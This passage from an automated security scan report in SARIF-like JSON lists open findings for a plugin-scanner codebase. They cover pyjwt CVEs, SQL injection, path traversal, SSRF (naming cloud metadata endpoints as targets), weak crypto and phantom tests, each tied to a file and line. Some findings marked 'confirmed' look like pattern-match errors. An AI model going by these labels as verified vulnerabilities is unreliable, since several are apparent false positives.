"PYSEC-2026-179", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-179"}, "properties": {"repobilityId": 145069, "scanner": "osv-scanner", "fingerprint": "b0f57bc88ba014761212b138f85e0d2f3080fd666d806ad5ed415168af003887", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48526", "GHSA-xgmm-8j9v-c9wx"], "package": "pyjwt", "rule_id": "PYSEC-2026-179", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48526|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-178", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-178"}, "properties": {"repobilityId": 145068, "scanner": "osv-scanner", "fingerprint": "03fa487ca5464d9cb9de1d4dbb36760077a8c755c6d869697bd0aa2d824f1c47", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48525", "GHSA-w7vc-732c-9m39"], "package": "pyjwt", "rule_id": "PYSEC-2026-178", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48525|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-177", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-177"}, "properties": {"repobilityId": 145067, "scanner": "osv-scanner", "fingerprint": "1b2ae50d86c4f2c649125c3e56b4fff487f87b74245fa0be49151f29e7e8d96a", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48524", "GHSA-fhv5-28vv-h8m8"], "package": "pyjwt", "rule_id": "PYSEC-2026-177", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48524|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-175", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-175"}, "properties": {"repobilityId": 145066, "scanner": "osv-scanner", "fingerprint": "bf0fc737bfb197ac41cf8574a4875b58cf0f24492511f65af343037c0387acbf", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48522", "GHSA-993g-76c3-p5m4"], "package": "pyjwt", "rule_id": "PYSEC-2026-175", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48522|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "MINED009", "level": "error", "message": {"text": "[MINED009] Floats For Money: Variable named price/amount/cost typed as float instead of Decimal."}, "properties": {"repobilityId": 145029, "scanner": "repobility-threat-engine", "fingerprint": "972fbbaa7a12a72bbfcb1861c864679232e3f80170bab29e4246b8b85af66fde", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "floats-for-money", "owasp": null, "cwe_ids": ["CWE-682"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347918+00:00", "triaged_in_corpus": 15, "observations_count": 208571, "ai_coder_pattern_id": 20}, "scanner": "repobility-threat-engine", "correlation_key": "fp|972fbbaa7a12a72bbfcb1861c864679232e3f80170bab29e4246b8b85af66fde"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/trust_models.py"}, "region": {"startLine": 56}}}]}, {"ruleId": "SEC128", "level": "error", "message": {"text": "[SEC128] Async function without await \u2014 fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work completes \u2014 DB writes lost, emails not sent, race conditions. This is one of the top-3 errors AI coders make: they understand async-shape but drop the await keyword when chaining multiple ops. Surfaces as flaky tests or silently dropped data in production."}, "properties": {"repobilityId": 145028, "scanner": "repobility-threat-engine", "fingerprint": "519297ca500173880c534fbb319442bc51b2ee6066af073bd1c5ff5d7b7d158c", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "hasher.update(chunk)", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC128", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|519297ca500173880c534fbb319442bc51b2ee6066af073bd1c5ff5d7b7d158c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/quality_artifact.py"}, "region": {"startLine": 42}}}]}, {"ruleId": "MINED006", "level": "error", "message": {"text": "[MINED006] Overcatch Baseexception: except BaseException: ... \u2014 prevents Ctrl+C and SystemExit from working."}, "properties": {"repobilityId": 145027, "scanner": "repobility-threat-engine", "fingerprint": "aa61af5c165c327eda37b36f5b2721255277fc967628af6c1e50e0038901fdd2", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "overcatch-baseexception", "owasp": null, "cwe_ids": ["CWE-705"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347911+00:00", "triaged_in_corpus": 15, "observations_count": 230624, "ai_coder_pattern_id": 8}, "scanner": "repobility-threat-engine", "correlation_key": "fp|aa61af5c165c327eda37b36f5b2721255277fc967628af6c1e50e0038901fdd2"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/integrations/cisco_skill_scanner.py"}, "region": {"startLine": 90}}}]}, {"ruleId": "MINED004", "level": "error", "message": {"text": "[MINED004] Weak Crypto: MD5/SHA1/DES/RC4 used for security context (not just checksums)."}, "properties": {"repobilityId": 145026, "scanner": "repobility-threat-engine", "fingerprint": "3f3ba19280af73227a0cfb6a3ea7717033c46211a0f44a6eac914d90179bc4af", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "weak-crypto", "owasp": "A02:2021", "cwe_ids": ["CWE-327"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347906+00:00", "triaged_in_corpus": 15, "observations_count": 303181, "ai_coder_pattern_id": 13}, "scanner": "repobility-threat-engine", "correlation_key": "fp|3f3ba19280af73227a0cfb6a3ea7717033c46211a0f44a6eac914d90179bc4af"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/totp.py"}, "region": {"startLine": 17}}}]}, {"ruleId": "SEC004", "level": "error", "message": {"text": "[SEC004] SQL Injection Risk: String interpolation in SQL execution. Allows SQL injection."}, "properties": {"repobilityId": 145020, "scanner": "repobility-threat-engine", "fingerprint": "dc199c16fbaa39b826c3911761a55c1200ed46c57521675fbb7810758f2d5907", "category": "injection", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": ".execute(\n        f\"select", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC004", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|injection|token|173|sec004"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store_evidence.py"}, "region": {"startLine": 173}}}]}, {"ruleId": "SEC078", "level": "error", "message": {"text": "[SEC078] Python: requests without timeout: requests.get/post without a timeout will hang indefinitely on a non-responsive server, causing thread exhaustion and ReDoS. Ported from bandit B113 (Apache-2.0). NOTE: this regex is heuristic; a real AST check is preferred for accuracy."}, "properties": {"repobilityId": 145014, "scanner": "repobility-threat-engine", "fingerprint": "b1c2c3b4bb1cbe7b26af172c9d09cda5836b77f631115f2c08ea24b4aeaa730c", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "requests.post(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC078", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|b1c2c3b4bb1cbe7b26af172c9d09cda5836b77f631115f2c08ea24b4aeaa730c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/bridge/__init__.py"}, "region": {"startLine": 103}}}]}, {"ruleId": "SEC013", "level": "error", "message": {"text": "[SEC013] Path Traversal \u2014 User Input in File Path: User-controlled input used in file path without sanitization. Allows reading arbitrary files."}, "properties": {"repobilityId": 145012, "scanner": "repobility-threat-engine", "fingerprint": "85d64e175210ddadf34637d0f12dc24dc61f9c6f76fb0d0e75d005045b3524b5", "category": "path_traversal", "severity": "high", "confidence": 0.8, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "User-controlled input detected in file path construction", "evidence": {"match": "open(request", "reason": "User-controlled input detected in file path construction", "rule_id": "SEC013", "scanner": "repobility-threat-engine", "confidence": 0.8, "correlation_key": "code|path_traversal|token|153|sec013"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/client.py"}, "region": {"startLine": 153}}}]}, {"ruleId": "SEC013", "level": "error", "message": {"text": "[SEC013] Path Traversal \u2014 User Input in File Path: User-controlled input used in file path without sanitization. Allows reading arbitrary files."}, "properties": {"repobilityId": 145011, "scanner": "repobility-threat-engine", "fingerprint": "2117336c2a032232d8529bbc3c376e14ca731877099e6a53a570bcbd73621755", "category": "path_traversal", "severity": "high", "confidence": 0.8, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "User-controlled input detected in file path construction", "evidence": {"match": "open(request", "reason": "User-controlled input detected in file path construction", "rule_id": "SEC013", "scanner": "repobility-threat-engine", "confidence": 0.8, "correlation_key": "code|path_traversal|token|111|sec013"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/adapters/claude_daemon_hook_bridge.py"}, "region": {"startLine": 111}}}]}, {"ruleId": "SEC013", "level": "error", "message": {"text": "[SEC013] Path Traversal \u2014 User Input in File Path: User-controlled input used in file path without sanitization. Allows reading arbitrary files."}, "properties": {"repobilityId": 145010, "scanner": "repobility-threat-engine", "fingerprint": "126992c146fc04e342ea9a78c0a5311c0498280d865c628c25b26c63666ec044", "category": "path_traversal", "severity": "high", "confidence": 0.8, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "User-controlled input detected in file path construction", "evidence": {"match": "open(request, timeout=REQUEST", "reason": "User-controlled input detected in file path construction", "rule_id": "SEC013", "scanner": "repobility-threat-engine", "confidence": 0.8, "correlation_key": "code|path_traversal|token|232|sec013"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/github_reporting.py"}, "region": {"startLine": 232}}}]}, {"ruleId": "MINED001", "level": "error", "message": {"text": "[MINED001] Bare Except Pass: except: pass or except Exception: pass \u2014 silently swallows everything including KeyboardInterrupt and bugs."}, "properties": {"repobilityId": 145004, "scanner": "repobility-threat-engine", "fingerprint": "d0ad6eeb850a0779c3bbe29e6247009871667c85e0f344f729af0c6a8b02cfdf", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "bare-except-pass", "owasp": null, "cwe_ids": ["CWE-755"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347744+00:00", "triaged_in_corpus": 15, "observations_count": 1550824, "ai_coder_pattern_id": 6}, "scanner": "repobility-threat-engine", "correlation_key": "fp|d0ad6eeb850a0779c3bbe29e6247009871667c85e0f344f729af0c6a8b02cfdf"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/gemini.py"}, "region": {"startLine": 28}}}]}, {"ruleId": "MINED001", "level": "error", "message": {"text": "[MINED001] Bare Except Pass: except: pass or except Exception: pass \u2014 silently swallows everything including KeyboardInterrupt and bugs."}, "properties": {"repobilityId": 145003, "scanner": "repobility-threat-engine", "fingerprint": "50296fffaf8d0454cff63551194635753eab27b4db596a4471e47f04deb4afc0", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "bare-except-pass", "owasp": null, "cwe_ids": ["CWE-755"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347744+00:00", "triaged_in_corpus": 15, "observations_count": 1550824, "ai_coder_pattern_id": 6}, "scanner": "repobility-threat-engine", "correlation_key": "fp|50296fffaf8d0454cff63551194635753eab27b4db596a4471e47f04deb4afc0"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/codex.py"}, "region": {"startLine": 28}}}]}, {"ruleId": "MINED001", "level": "error", "message": {"text": "[MINED001] Bare Except Pass: except: pass or except Exception: pass \u2014 silently swallows everything including KeyboardInterrupt and bugs."}, "properties": {"repobilityId": 145002, "scanner": "repobility-threat-engine", "fingerprint": "8b1c3f83066a12a1351d387fe25dca145322b60ec8df45e079c50fca50e22ae3", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "bare-except-pass", "owasp": null, "cwe_ids": ["CWE-755"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347744+00:00", "triaged_in_corpus": 15, "observations_count": 1550824, "ai_coder_pattern_id": 6}, "scanner": "repobility-threat-engine", "correlation_key": "fp|8b1c3f83066a12a1351d387fe25dca145322b60ec8df45e079c50fca50e22ae3"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/claude.py"}, "region": {"startLine": 28}}}]}, {"ruleId": "SEC085", "level": "error", "message": {"text": "[SEC085] JS: child_process.exec with non-literal: child_process.exec with user-derived input enables command injection. Ported from eslint-plugin-security detect-child-process (Apache-2.0)."}, "properties": {"repobilityId": 144993, "scanner": "repobility-threat-engine", "fingerprint": "8a4b21c987cb0b1b687395a1c8a5c54ae5cb00d332a80633c3c0ed86e8defeb3", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "exec(primary", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC085", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|8a4b21c987cb0b1b687395a1c8a5c54ae5cb00d332a80633c3c0ed86e8defeb3"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/risk-signal-cards.tsx"}, "region": {"startLine": 114}}}]}, {"ruleId": "SEC029", "level": "error", "message": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.254.169.254 metadata, internal Kubernetes endpoints, file:// URIs), exfiltrate data, or pivot through your network. SSRF is OWASP A10:2021 and a frequent foothold in cloud breaches."}, "properties": {"repobilityId": 144990, "scanner": "repobility-threat-engine", "fingerprint": "3f656327a4839a29c3d150ccaea16d2c8c88d98d9a2fa4b24667b8a36f64fa22", "category": "ssrf", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "url(v", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC029", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|3f656327a4839a29c3d150ccaea16d2c8c88d98d9a2fa4b24667b8a36f64fa22"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/checks/manifest_support.py"}, "region": {"startLine": 48}}}]}, {"ruleId": "SEC029", "level": "error", "message": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.254.169.254 metadata, internal Kubernetes endpoints, file:// URIs), exfiltrate data, or pivot through your network. SSRF is OWASP A10:2021 and a frequent foothold in cloud breaches."}, "properties": {"repobilityId": 144989, "scanner": "repobility-threat-engine", "fingerprint": "3360ff6d684d6491a5498be4f1f808d473d1eb9cba820c7dc038397199875f9e", "category": "ssrf", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "URL(b", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC029", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|3360ff6d684d6491a5498be4f1f808d473d1eb9cba820c7dc038397199875f9e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/history-export.ts"}, "region": {"startLine": 76}}}]}, {"ruleId": "SEC029", "level": "error", "message": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.254.169.254 metadata, internal Kubernetes endpoints, file:// URIs), exfiltrate data, or pivot through your network. SSRF is OWASP A10:2021 and a frequent foothold in cloud breaches."}, "properties": {"repobilityId": 144988, "scanner": "repobility-threat-engine", "fingerprint": "93a728cbb36055163dcbc76887182ef56a9a08be65da09f745f01ca2176ea706", "category": "ssrf", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "URL(w", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC029", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|93a728cbb36055163dcbc76887182ef56a9a08be65da09f745f01ca2176ea706"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/evidence/evidence-url-state.ts"}, "region": {"startLine": 91}}}]}, {"ruleId": "MINED118", "level": "error", "message": {"text": "Dockerfile FROM `codex_plugin_scanner.cli (no tag)` not pinned by digest"}, "properties": {"repobilityId": 144973, "scanner": "repobility-supply-chain", "fingerprint": "c9ee5d58994dbb5821e61a68d923a96876bfd08ee00d73b4deb811dc984a77be", "category": "dependency", "severity": "high", "confidence": 0.9, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "docker-from-unpinned", "owasp": "A08:2021", "cwe_ids": ["CWE-829"], "languages": ["dockerfile"], "observations_count": 0}, "scanner": "repobility-supply-chain", "correlation_key": "fp|c9ee5d58994dbb5821e61a68d923a96876bfd08ee00d73b4deb811dc984a77be"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "Dockerfile"}, "region": {"startLine": 35}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_future_generated_at_fails"}, "properties": {"repobilityId": 144936, "scanner": "repobility-ast-engine", "fingerprint": "4099a0180d3e9bdaa6f0fef2baee15c2311f538a1d45d457e1ba0e96951c11a9", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4099a0180d3e9bdaa6f0fef2baee15c2311f538a1d45d457e1ba0e96951c11a9"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 209}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_expired_bundle_fails"}, "properties": {"repobilityId": 144935, "scanner": "repobility-ast-engine", "fingerprint": "4dd75ebdad4d11d1ecfd1516eb4437801a89e480d0f792666ee790e97c842ae0", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4dd75ebdad4d11d1ecfd1516eb4437801a89e480d0f792666ee790e97c842ae0"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 203}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_fresh_bundle_passes"}, "properties": {"repobilityId": 144934, "scanner": "repobility-ast-engine", "fingerprint": "df4c5af9ac99bb85d087344498017a2d9d58b1a3ce1963de5abd930a60ec0271", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|df4c5af9ac99bb85d087344498017a2d9d58b1a3ce1963de5abd930a60ec0271"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 198}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_invalid_public_key_pem_fails"}, "properties": {"repobilityId": 144933, "scanner": "repobility-ast-engine", "fingerprint": "99f532ea254be9f4398454c4928a759554be3029ed9e2f6ad193859000bb2ab7", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|99f532ea254be9f4398454c4928a759554be3029ed9e2f6ad193859000bb2ab7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 188}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_invalid_base64_signature_fails"}, "properties": {"repobilityId": 144932, "scanner": "repobility-ast-engine", "fingerprint": "6f479a79a00f5ea5757bac1d5050624b498f7a5b0b402f31621fbe9ddd3a9b34", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|6f479a79a00f5ea5757bac1d5050624b498f7a5b0b402f31621fbe9ddd3a9b34"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 182}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_wrong_key_fails"}, "properties": {"repobilityId": 144931, "scanner": "repobility-ast-engine", "fingerprint": "378208c2971a38488685b261f942ceb3178788220885693e0e875a822d0f857d", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|378208c2971a38488685b261f942ceb3178788220885693e0e875a822d0f857d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 175}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_tampered_advisory_fails"}, "properties": {"repobilityId": 144930, "scanner": "repobility-ast-engine", "fingerprint": "15a23fda201269eb102636245231686aed2e053ab459bf368d0730b2ef768a29", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|15a23fda201269eb102636245231686aed2e053ab459bf368d0730b2ef768a29"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 161}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_valid_signature_passes"}, "properties": {"repobilityId": 144929, "scanner": "repobility-ast-engine", "fingerprint": "e634d44606a51dc4eae5392e34404d1553ff1c8abc6eff8b2dffcceec65804b4", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|e634d44606a51dc4eae5392e34404d1553ff1c8abc6eff8b2dffcceec65804b4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 156}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_encoded_canary_script_is_valid_python"}, "properties": {"repobilityId": 144928, "scanner": "repobility-ast-engine", "fingerprint": "86148c73e6216913a1ea0b172f429a8e49f4a6491c83a48efee256dfe9240939", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|86148c73e6216913a1ea0b172f429a8e49f4a6491c83a48efee256dfe9240939"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_canary_fixtures.py"}, "region": {"startLine": 102}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_canary_script_is_valid_python"}, "properties": {"repobilityId": 144927, "scanner": "repobility-ast-engine", "fingerprint": "b2daa29986254e47d8f7a0dbb85024347d2b5fe7308d47d73ae3c94e632ee36e", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b2daa29986254e47d8f7a0dbb85024347d2b5fe7308d47d73ae3c94e632ee36e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_canary_fixtures.py"}, "region": {"startLine": 51}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_loopback_redirect_handler_rejects_remote_redirect"}, "properties": {"repobilityId": 144926, "scanner": "repobility-ast-engine", "fingerprint": "974693b7369b4d9fb5eed55d1fc1d38fcf9a8f6818bc0ef98afc4ff4e9f594b2", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|974693b7369b4d9fb5eed55d1fc1d38fcf9a8f6818bc0ef98afc4ff4e9f594b2"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_claude_daemon_hook_bridge.py"}, "region": {"startLine": 120}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_daemon_url_rejects_non_loopback_fallback"}, "properties": {"repobilityId": 144925, "scanner": "repobility-ast-engine", "fingerprint": "ee4800be8f2853953b1e478ed15bd53b5192b281b64d4d039bd2695bc146cda0", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ee4800be8f2853953b1e478ed15bd53b5192b281b64d4d039bd2695bc146cda0"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_claude_daemon_hook_bridge.py"}, "region": {"startLine": 47}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_assert_loopback_http_url_rejects_remote_host"}, "properties": {"repobilityId": 144924, "scanner": "repobility-ast-engine", "fingerprint": "ef4637220e7c685d039ae3a5513b28b923dd8f3ed1bb2cd41d169e3385df46c1", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ef4637220e7c685d039ae3a5513b28b923dd8f3ed1bb2cd41d169e3385df46c1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_claude_daemon_hook_bridge.py"}, "region": {"startLine": 42}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": 